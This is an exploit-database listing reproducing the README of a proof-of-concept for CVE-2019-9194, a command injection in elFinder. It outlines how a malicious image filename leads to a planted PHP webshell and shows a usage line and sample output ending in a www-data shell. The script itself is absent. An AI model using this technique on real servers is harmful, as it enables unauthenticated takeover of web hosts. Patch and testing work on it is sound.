Exploit for OS Command Injection in Std42 Elfinder CVE-2019-9194

Name: Exploit for OS Command Injection in Std42 Elfinder CVE-2019-9194
Rating: 5 (296 reviews)
2026-02-18 | CVSS 9.8
## https://sploitus.com/exploit?id=84295AD6-4CA5-52DF-949D-5243E681C6BA
# CVE-2019-9194 — elFinder Command Injection (PoC)

> Command injection vulnerability in elFinder &lt;= 2.1.47 via the PHP connector component. Allows unauthenticated remote code execution as the web server user.

## How it works

Uploads a valid JPEG with a malicious filename containing a shell command.
Triggers the vulnerability by requesting an image rotation, which passes the filename to exiftran without sanitization.
The injected command writes a PHP webshell (SecSignal.php) to the server.
Connects to the webshell and drops into an interactive shell.

## Requirements

- Python 3
- requests library (pip install requests)
- Target must have exiftran installed and the elFinder PHP connector enabled (connector.minimal.php)

## Usage

```bash
python3 exploit.py http://TARGET
```

### Example:

```bash
$ python3 exploit.py http://10.10.10.10/elFinder
[*] Uploading malicious image...
[*] File uploaded, hash: l1_U2VjU2lnbmFsLmpwZw
[*] Triggering command injection via image rotation...
[*] Checking for webshell...
[+] Pwned!
[+] Interactive shell (Ctrl+C to exit)

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

## References

- [CVE-2019-9194](https://nvd.nist.gov/vuln/detail/CVE-2019-9194)
- [EDB-46481](https://www.exploit-db.com/exploits/46481)
- [Vulnerability writeup — SecSignal](https://github.com/advisories/GHSA-4223-qj94-7x9p)
- [elFinder 2.1.48 release (fix)](https://github.com/Studio-42/elFinder/releases/tag/2.1.48)

Credits

- Discovery: Thomas Chauchefoin
- Original exploit: @q3rv0
- Python 3 port & Metasploit-style improvements: [Esteban Zárate](https://github.com/estebanzarate)